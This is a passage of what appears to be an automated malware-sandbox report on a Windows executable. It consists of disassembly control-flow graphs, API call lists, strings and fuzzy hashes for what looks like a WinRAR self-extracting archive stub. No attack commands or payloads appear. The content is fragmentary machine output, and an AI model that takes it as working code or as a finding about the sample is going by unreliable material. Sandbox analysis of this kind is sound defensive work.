24772->24771 24773->24730 24774->24735 24775->24733 24777 1dc8db 24776->24777 24782 1da90e 84 API calls 24777->24782 24779 1dc90d 24783 1da90e 84 API calls 24779->24783 24781 1dc918 24782->24779 24783->24781 24785 1da5fe 24784->24785 24786 1da691 FindNextFileW 24785->24786 24787 1da621 FindFirstFileW 24785->24787 24788 1da69c GetLastError 24786->24788 24789 1da6b0 24786->24789 24790 1da638 24787->24790 24795 1da675 24787->24795 24788->24789 24789->24795 24791 1db66c 2 API calls 24790->24791 24792 1da64d 24791->24792 24793 1da66a GetLastError 24792->24793 24794 1da651 FindFirstFileW 24792->24794 24793->24795 24794->24793 24794->24795 24795->24422 24796->24255 24797->24261 24798->24261 24799->24264 24800->24272 24802 1d9ef7 76 API calls 24801->24802 24803 1d1f5b 24802->24803 24804 1d19a6 97 API calls 24803->24804 24807 1d1f78 24803->24807 24805 1d1f68 24804->24805 24805->24807 24808 1d6dc1 74 API calls 24805->24808 24807->24280 24807->24281 24808->24807 24858 1eb8e0 93 API calls _swprintf 24859 1e8ce0 6 API calls

                Control-flow Graph

                APIs
                  • Part of subcall function 001E00CF: GetModuleHandleW.KERNEL32(kernel32), ref: 001E00E4
                  • Part of subcall function 001E00CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 001E00F6
                  • Part of subcall function 001E00CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 001E0127
                  • Part of subcall function 001E9DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 001E9DAC
                  • Part of subcall function 001EA335: OleInitialize.OLE32(00000000), ref: 001EA34E
                  • Part of subcall function 001EA335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 001EA385
                  • Part of subcall function 001EA335: SHGetMalloc.SHELL32(00218430), ref: 001EA38F
                  • Part of subcall function 001E13B3: GetCPInfo.KERNEL32(00000000,?), ref: 001E13C4
                  • Part of subcall function 001E13B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 001E13D8
                • GetCommandLineW.KERNEL32 ref: 001ED61C
                • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 001ED643
                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 001ED654
                • UnmapViewOfFile.KERNEL32(00000000), ref: 001ED68E
                  • Part of subcall function 001ED287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 001ED29D
                  • Part of subcall function 001ED287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 001ED2D9
                • CloseHandle.KERNEL32(00000000), ref: 001ED697
                • GetModuleFileNameW.KERNEL32(00000000,0022DC90,00000800), ref: 001ED6B2
                • SetEnvironmentVariableW.KERNEL32(sfxname,0022DC90), ref: 001ED6BE
                • GetLocalTime.KERNEL32(?), ref: 001ED6C9
                • _swprintf.LIBCMT ref: 001ED708
                • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 001ED71A
                • GetModuleHandleW.KERNEL32(00000000), ref: 001ED721
                • LoadIconW.USER32(00000000,00000064), ref: 001ED738
                • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 001ED789
                • Sleep.KERNEL32(?), ref: 001ED7B7
                • DeleteObject.GDI32 ref: 001ED7F0
                • DeleteObject.GDI32(?), ref: 001ED800
                • CloseHandle.KERNEL32 ref: 001ED843
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xj"
                • API String ID: 788466649-3421357007
                • Opcode ID: 763e273817e1e421b0d273a39238159da8d5b43bdb5ad7bfa33339af97f5cd06
                • Instruction ID: 9250131dd5d7ff32441a5b4d3f5a931d844af33112e6b897b63bc5c26f0fa9dc
                • Opcode Fuzzy Hash: 763e273817e1e421b0d273a39238159da8d5b43bdb5ad7bfa33339af97f5cd06
                • Instruction Fuzzy Hash: 7261F671900791BFD320AFA2FC8DF6F77ACAB69744F004429F549922A2DF748944C762

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 770 1e9e1c-1e9e38 FindResourceW 771 1e9e3e-1e9e50 SizeofResource 770->771 772 1e9f2f-1e9f32 770->772 773 1e9e52-1e9e61 LoadResource 771->773 774 1e9e70-1e9e72 771->774 773->774 775 1e9e63-1e9e6e LockResource 773->775 776 1e9f2e 774->776 775->774 777 1e9e77-1e9e8c GlobalAlloc 775->777 776->772 778 1e9f28-1e9f2d 777->778 779 1e9e92-1e9e9b GlobalLock 777->779 778->776 780 1e9f21-1e9f22 GlobalFree 779->780 781 1e9ea1-1e9ebf call 1ef4b0 CreateStreamOnHGlobal 779->781 780->778 784 1e9f1a-1e9f1b GlobalUnlock 781->784 785 1e9ec1-1e9ee3 call 1e9d7b 781->785 784->780 785->784 790 1e9ee5-1e9eed 785->790 791 1e9eef-1e9f03 GdipCreateHBITMAPFromBitmap 790->791 792 1e9f08-1e9f16 790->792 791->792 793 1e9f05 791->793 792->784 793->792
                APIs
                • FindResourceW.KERNEL32(001EAE4D,PNG,?,?,?,001EAE4D,00000066), ref: 001E9E2E
                • SizeofResource.KERNEL32(00000000,00000000,?,?,?,001EAE4D,00000066), ref: 001E9E46
                • LoadResource.KERNEL32(00000000,?,?,?,001EAE4D,00000066), ref: 001E9E59
                • LockResource.KERNEL32(00000000,?,?,?,001EAE4D,00000066), ref: 001E9E64
                • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,001EAE4D,00000066), ref: 001E9E82
                • GlobalLock.KERNEL32(00000000), ref: 001E9E93
                • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 001E9EB7
                • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 001E9EFC
                • GlobalUnlock.KERNEL32(00000000), ref: 001E9F1B
                • GlobalFree.KERNEL32(00000000), ref: 001E9F22
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                • String ID: PNG
                • API String ID: 3656887471-364855578
                • Opcode ID: 3cffc9804983e1c6706e576206f7ae4f7d725a9765c2cd294e2ced96c3fa1939
                • Instruction ID: bc99dd906f1fdf0c973f735d0ff79c995096d0878d6e8eed00b0b6ee450fa7d6
                • Opcode Fuzzy Hash: 3cffc9804983e1c6706e576206f7ae4f7d725a9765c2cd294e2ced96c3fa1939
                • Instruction Fuzzy Hash: 48316F71204B46AFC7119F62EC4C96FBFADFF89751B044518F946D2261EB72DC108BA1

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 970 1da5f4-1da61f call 1ee360 973 1da691-1da69a FindNextFileW 970->973 974 1da621-1da632 FindFirstFileW 970->974 975 1da69c-1da6aa GetLastError 973->975 976 1da6b0-1da6b2 973->976 977 1da6b8-1da75c call 1dfe56 call 1dbcfb call 1e0e19 * 3 974->977 978 1da638-1da64f call 1db66c 974->978 975->976 976->977 979 1da761-1da774 976->979 977->979 984 1da66a-1da673 GetLastError 978->984 985 1da651-1da668 FindFirstFileW 978->985 987 1da675-1da678 984->987 988 1da684 984->988 985->977 985->984 987->988 990 1da67a-1da67d 987->990 991 1da686-1da68c 988->991 990->988 994 1da67f-1da682 990->994 991->979 994->991
                APIs
                • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,001DA4EF,000000FF,?,?), ref: 001DA628
                • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,001DA4EF,000000FF,?,?), ref: 001DA65E
                • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,001DA4EF,000000FF,?,?), ref: 001DA66A
                • FindNextFileW.KERNEL32(?,?,?,?,?,?,001DA4EF,000000FF,?,?), ref: 001DA692
                • GetLastError.KERNEL32(?,?,?,?,001DA4EF,000000FF,?,?), ref: 001DA69E
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: FileFind$ErrorFirstLast$Next
                • String ID:
                • API String ID: 869497890-0
                • Opcode ID: 31929ca665347c3f664ff592db6efb18a8373972661dacf6ec912122560e0aa1
                • Instruction ID: 074a913934f3dcb898e6eb0ae9aeab1ed971ffa54e92331af876a09301215cf4
                • Opcode Fuzzy Hash: 31929ca665347c3f664ff592db6efb18a8373972661dacf6ec912122560e0aa1
                • Instruction Fuzzy Hash: 98416072505781EFC324EF78C884ADAF7E8BF58340F050A2AF599D3241D774A9548B92
                APIs
                • GetCurrentProcess.KERNEL32(00000000,?,001F7513,00000000,0020BAD8,0000000C,001F766A,00000000,00000002,00000000), ref: 001F755E
                • TerminateProcess.KERNEL32(00000000,?,001F7513,00000000,0020BAD8,0000000C,001F766A,00000000,00000002,00000000), ref: 001F7565
                • ExitProcess.KERNEL32 ref: 001F7577
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: Process$CurrentExitTerminate
                • String ID:
                • API String ID: 1703294689-0
                • Opcode ID: fac224761f553d53c9c97584fcd6889ef4a87e2d08d0b97c1d7ea7dd94c2d1f6
                • Instruction ID: 7ccf1a44bfccee170d84bd623089ff7326085aea59021a2d0fbc99579d6a469a
                • Opcode Fuzzy Hash: fac224761f553d53c9c97584fcd6889ef4a87e2d08d0b97c1d7ea7dd94c2d1f6
                • Instruction Fuzzy Hash: 3AE0B671005A48ABDF11EF64ED0DA697B6AEF54782F108414FA098A272CB35DE42DA90
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: H_prolog_memcmp
                • String ID:
                • API String ID: 3004599000-0
                • Opcode ID: a5a891fdd8e9cc826e875ca619deb7ade061a83bbd26c205b95857cf1e6144db
                • Instruction ID: 3fee89e0151147b414e7a559b67b0e708c1e3445ac91e6a277d7d436e0ce58e8
                • Opcode Fuzzy Hash: a5a891fdd8e9cc826e875ca619deb7ade061a83bbd26c205b95857cf1e6144db
                • Instruction Fuzzy Hash: FD820A71904285AEDF25DF74C895BFEB7B9AF15300F0841BBE8599B382DB315A48CB60
                APIs
                • __EH_prolog.LIBCMT ref: 001EAEE5
                  • Part of subcall function 001D130B: GetDlgItem.USER32(00000000,00003021), ref: 001D134F
                  • Part of subcall function 001D130B: SetWindowTextW.USER32(00000000,002035B4), ref: 001D1365
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: H_prologItemTextWindow
                • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                • API String ID: 810644672-8108337
                • Opcode ID: 590a3e412959c11d35049b766e956d762ea02621a3bb06bcaee514aa0612d8f2
                • Instruction ID: fae76fa02e37d1fd484655a4af141c36345f2dddc5a1aea03496abe0899e408f
                • Opcode Fuzzy Hash: 590a3e412959c11d35049b766e956d762ea02621a3bb06bcaee514aa0612d8f2
                • Instruction Fuzzy Hash: 0A42E070948694BEEB21ABA1ACCEFEF7BBCAB21700F404055F645A61D2CF745948CB61

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 257 1e00cf-1e00ee call 1ee360 GetModuleHandleW 260 1e0154-1e03b2 257->260 261 1e00f0-1e0107 GetProcAddress 257->261 262 1e03b8-1e03c3 call 1f70dd 260->262 263 1e0484-1e04b3 GetModuleFileNameW call 1dbc85 call 1dfe56 260->263 264 1e0109-1e011f 261->264 265 1e0121-1e0131 GetProcAddress 261->265 262->263 273 1e03c9-1e03fa GetModuleFileNameW CreateFileW 262->273 278 1e04b5-1e04bf call 1dacf5 263->278 264->265 265->260 267 1e0133-1e0152 265->267 267->260 276 1e03fc-1e040a SetFilePointer 273->276 277 1e0478-1e047f CloseHandle 273->277 276->277 279 1e040c-1e0429 ReadFile 276->279 277->263 285 1e04cc 278->285 286 1e04c1-1e04c5 call 1e0085 278->286 279->277 282 1e042b-1e0450 279->282 284 1e046d-1e0476 call 1dfbd8 282->284 284->277 294 1e0452-1e046c call 1e0085 284->294 289 1e04ce-1e04d0 285->289 291 1e04ca 286->291 292 1e04f2-1e0518 call 1dbcfb GetFileAttributesW 289->292 293 1e04d2-1e04f0 CompareStringW 289->293 291->289 296 1e051a-1e051e 292->296 302 1e0522 292->302 293->292 293->296 294->284 296->278 298 1e0520 296->298 301 1e0526-1e0528 298->301 303 1e052a 301->303 304 1e0560-1e0562 301->304 302->301 305 1e052c-1e0552 call 1dbcfb GetFileAttributesW 303->305 306 1e066f-1e0679 304->306 307 1e0568-1e057f call 1dbccf call 1dacf5 304->307 312 1e055c 305->312 313 1e0554-1e0558 305->313 317 1e05e7-1e061a call 1d400a AllocConsole 307->317 318 1e0581-1e05e2 call 1e0085 * 2 call 1dddd1 call 1d400a call 1dddd1 call 1e9f35 307->318 312->304 313->305 315 1e055a 313->315 315->304 323 1e061c-1e0661 GetCurrentProcessId AttachConsole call 1f35b3 GetStdHandle WriteConsoleW Sleep FreeConsole 317->323 324 1e0667-1e0669 ExitProcess 317->324 318->324 323->324
                APIs
                • GetModuleHandleW.KERNEL32(kernel32), ref: 001E00E4
                • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 001E00F6
                • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 001E0127
                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 001E03D4
                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001E03F0
                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 001E0402
                • ReadFile.KERNEL32(00000000,?,00007FFE,00203BA4,00000000), ref: 001E0421
                • CloseHandle.KERNEL32(00000000), ref: 001E0479
                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 001E048F
                • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 001E04E7
                • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 001E0510
                • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 001E054A
                  • Part of subcall function 001E0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001E00A0
                  • Part of subcall function 001E0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,001DEB86,Crypt32.dll,00000000,001DEC0A,?,?,001DEBEC,?,?,?), ref: 001E00C2
                • _swprintf.LIBCMT ref: 001E05BE
                • _swprintf.LIBCMT ref: 001E060A
                  • Part of subcall function 001D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001D401D
                • AllocConsole.KERNEL32 ref: 001E0612
                • GetCurrentProcessId.KERNEL32 ref: 001E061C
                • AttachConsole.KERNEL32(00000000), ref: 001E0623
                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 001E0649
                • WriteConsoleW.KERNEL32(00000000), ref: 001E0650
                • Sleep.KERNEL32(00002710), ref: 001E065B
                • FreeConsole.KERNEL32 ref: 001E0661
                • ExitProcess.KERNEL32 ref: 001E0669
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                • String ID: < $ ? $(> $(@ $0A $4= $8< $<? $@> $@@ $D= $DA $DXGIDebug.dll$P< $Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T; $T? $X> $X@ $\A $`= $dwmapi.dll$kernel32$l< $p> $p? $p@ $uxtheme.dll$x= $|< $> $?
                • API String ID: 1201351596-768046499
                • Opcode ID: 5ea681f017f43dc4547350e6da5eb7e3b987a562a410cc78d970fc3babd3c075
                • Instruction ID: 0bb2544224fb71d73182680aefa4ec8c038b008a8f5d1bd520905a1c6d89f0c6
                • Opcode Fuzzy Hash: 5ea681f017f43dc4547350e6da5eb7e3b987a562a410cc78d970fc3babd3c075
                • Instruction Fuzzy Hash: 72D183B10187849BD321EF51D84DB9FBAEDBF89704F00491DF689962C2DBB086588B62

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 406 1ebdf5-1ebe0d call 1ee28c call 1ee360 411 1ebe13-1ebe3d call 1eaa36 406->411 412 1eca90-1eca9d 406->412 411->412 415 1ebe43-1ebe48 411->415 416 1ebe49-1ebe57 415->416 417 1ebe58-1ebe6d call 1ea6c7 416->417 420 1ebe6f 417->420 421 1ebe71-1ebe86 call 1e17ac 420->421 424 1ebe88-1ebe8c 421->424 425 1ebe93-1ebe96 421->425 424->421 426 1ebe8e 424->426 427 1eca5c-1eca87 call 1eaa36 425->427 428 1ebe9c 425->428 426->427 427->416 439 1eca8d-1eca8f 427->439 430 1ec074-1ec076 428->430 431 1ec115-1ec117 428->431 432 1ec132-1ec134 428->432 433 1ebea3-1ebea6 428->433 430->427 437 1ec07c-1ec088 430->437 431->427 435 1ec11d-1ec12d SetWindowTextW 431->435 432->427 436 1ec13a-1ec141 432->436 433->427 438 1ebeac-1ebf06 call 1e9da4 call 1db965 call 1da49d call 1da5d7 call 1d70bf 433->438 435->427 436->427 440 1ec147-1ec160 436->440 441 1ec09c-1ec0a1 437->441 442 1ec08a-1ec09b call 1f7168 437->442 494 1ec045-1ec05a call 1da52a 438->494 439->412 444 1ec168-1ec176 call 1f35b3 440->444 445 1ec162 440->445 448 1ec0ab-1ec0b6 call 1eab9a 441->448 449 1ec0a3-1ec0a9 441->449 442->441 444->427 463 1ec17c-1ec185 444->463 445->444 450 1ec0bb-1ec0bd 448->450 449->450 456 1ec0bf-1ec0c6 call 1f35b3 450->456 457 1ec0c8-1ec0e8 call 1f35b3 call 1f35de 450->457 456->457 483 1ec0ea-1ec0f1 457->483 484 1ec101-1ec103 457->484 467 1ec1ae-1ec1b1 463->467 468 1ec187-1ec18b 463->468 471 1ec296-1ec2a4 call 1dfe56 467->471 472 1ec1b7-1ec1ba 467->472 468->467 469 1ec18d-1ec195 468->469 469->427 475 1ec19b-1ec1a9 call 1dfe56 469->475 485 1ec2a6-1ec2ba call 1f17cb 471->485 477 1ec1bc-1ec1c1 472->477 478 1ec1c7-1ec1e2 472->478 475->485 477->471 477->478 495 1ec22c-1ec233 478->495 496 1ec1e4-1ec21e 478->496 490 1ec0f8-1ec100 call 1f7168 483->490 491 1ec0f3-1ec0f5 483->491 484->427 486 1ec109-1ec110 call 1f35ce 484->486 505 1ec2bc-1ec2c0 485->505 506 1ec2c7-1ec318 call 1dfe56 call 1ea8d0 GetDlgItem SetWindowTextW SendMessageW call 1f35e9 485->506 486->427 490->484 491->490 512 1ebf0b-1ebf1f SetFileAttributesW 494->512 513 1ec060-1ec06f call 1da4b3 494->513 499 1ec235-1ec24d call 1f35b3 495->499 500 1ec261-1ec284 call 1f35b3 * 2 495->500 529 1ec222-1ec224 496->529 530 1ec220 496->530 499->500 516 1ec24f-1ec25c call 1dfe2e 499->516 500->485 534 1ec286-1ec294 call 1dfe2e 500->534 505->506 511 1ec2c2-1ec2c4 505->511 540 1ec31d-1ec321 506->540 511->506 517 1ebfc5-1ebfd5 GetFileAttributesW 512->517 518 1ebf25-1ebf58 call 1db4f7 call 1db207 call 1f35b3 512->518 513->427 516->500 517->494 527 1ebfd7-1ebfe6 DeleteFileW 517->527 550 1ebf5a-1ebf69 call 1f35b3 518->550 551 1ebf6b-1ebf79 call 1db925 518->551 527->494 533 1ebfe8-1ebfeb 527->533 529->495 530->529 537 1ebfef-1ec01b call 1d400a GetFileAttributesW 533->537 534->485 546 1ebfed-1ebfee 537->546 547 1ec01d-1ec033 MoveFileW 537->547 540->427 545 1ec327-1ec33b SendMessageW 540->545 545->427 546->537 547->494 549 1ec035-1ec03f MoveFileExW 547->549 549->494 550->551 556 1ebf7f-1ebfbe call 1f35b3 call 1ef350 550->556 551->513 551->556 556->517
                APIs
                • __EH_prolog.LIBCMT ref: 001EBDFA
                  • Part of subcall function 001EAA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 001EAAFE
                • SetWindowTextW.USER32(?,?), ref: 001EC127
                • _wcsrchr.LIBVCRUNTIME ref: 001EC2B1
                • GetDlgItem.USER32(?,00000066), ref: 001EC2EC
                • SetWindowTextW.USER32(00000000,?), ref: 001EC2FC
                • SendMessageW.USER32(00000000,00000143,00000000,0021A472), ref: 001EC30A
                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 001EC335
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                • API String ID: 3564274579-312220925
                • Opcode ID: 093affa4729bff42c370e32d91685827a0a1c2118d1f9d840cf7dd315359bed0
                • Instruction ID: 563a9a480e13d86d0106b487df1fc420a48b1424d3051544c35dc6dfdd065507
                • Opcode Fuzzy Hash: 093affa4729bff42c370e32d91685827a0a1c2118d1f9d840cf7dd315359bed0
                • Instruction Fuzzy Hash: 8EE19276D04659AADF25DBA1EC89DEF737CAF58310F0040A6F609E3191EB709B858F90

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 561 1dd341-1dd378 call 1ee28c call 1ee360 call 1f15e8 568 1dd3ab-1dd3b4 call 1dfe56 561->568 569 1dd37a-1dd3a9 GetModuleFileNameW call 1dbc85 call 1dfe2e 561->569 573 1dd3b9-1dd3dd call 1d9619 call 1d99b0 568->573 569->573 580 1dd7a0-1dd7a6 call 1d9653 573->580 581 1dd3e3-1dd3eb 573->581 585 1dd7ab-1dd7bb 580->585 583 1dd3ed-1dd405 call 1e3781 * 2 581->583 584 1dd409-1dd438 call 1f5a90 * 2 581->584 595 1dd407 583->595 594 1dd43b-1dd43e 584->594 596 1dd56c-1dd58f call 1d9d30 call 1f35d3 594->596 597 1dd444-1dd44a call 1d9e40 594->597 595->584 596->580 606 1dd595-1dd5b0 call 1d9bf0 596->606 601 1dd44f-1dd476 call 1d9bf0 597->601 607 1dd47c-1dd484 601->607 608 1dd535-1dd538 601->608 620 1dd5b9-1dd5cc call 1f35d3 606->620 621 1dd5b2-1dd5b7 606->621 610 1dd4af-1dd4ba 607->610 611 1dd486-1dd48e 607->611 612 1dd53b-1dd55d call 1d9d30 608->612 615 1dd4bc-1dd4c8 610->615 616 1dd4e5-1dd4ed 610->616 611->610 614 1dd490-1dd4aa call 1f5ec0 611->614 612->594 631 1dd563-1dd566 612->631 637 1dd4ac 614->637 638 1dd52b-1dd533 614->638 615->616 623 1dd4ca-1dd4cf 615->623 618 1dd4ef-1dd4f7 616->618 619 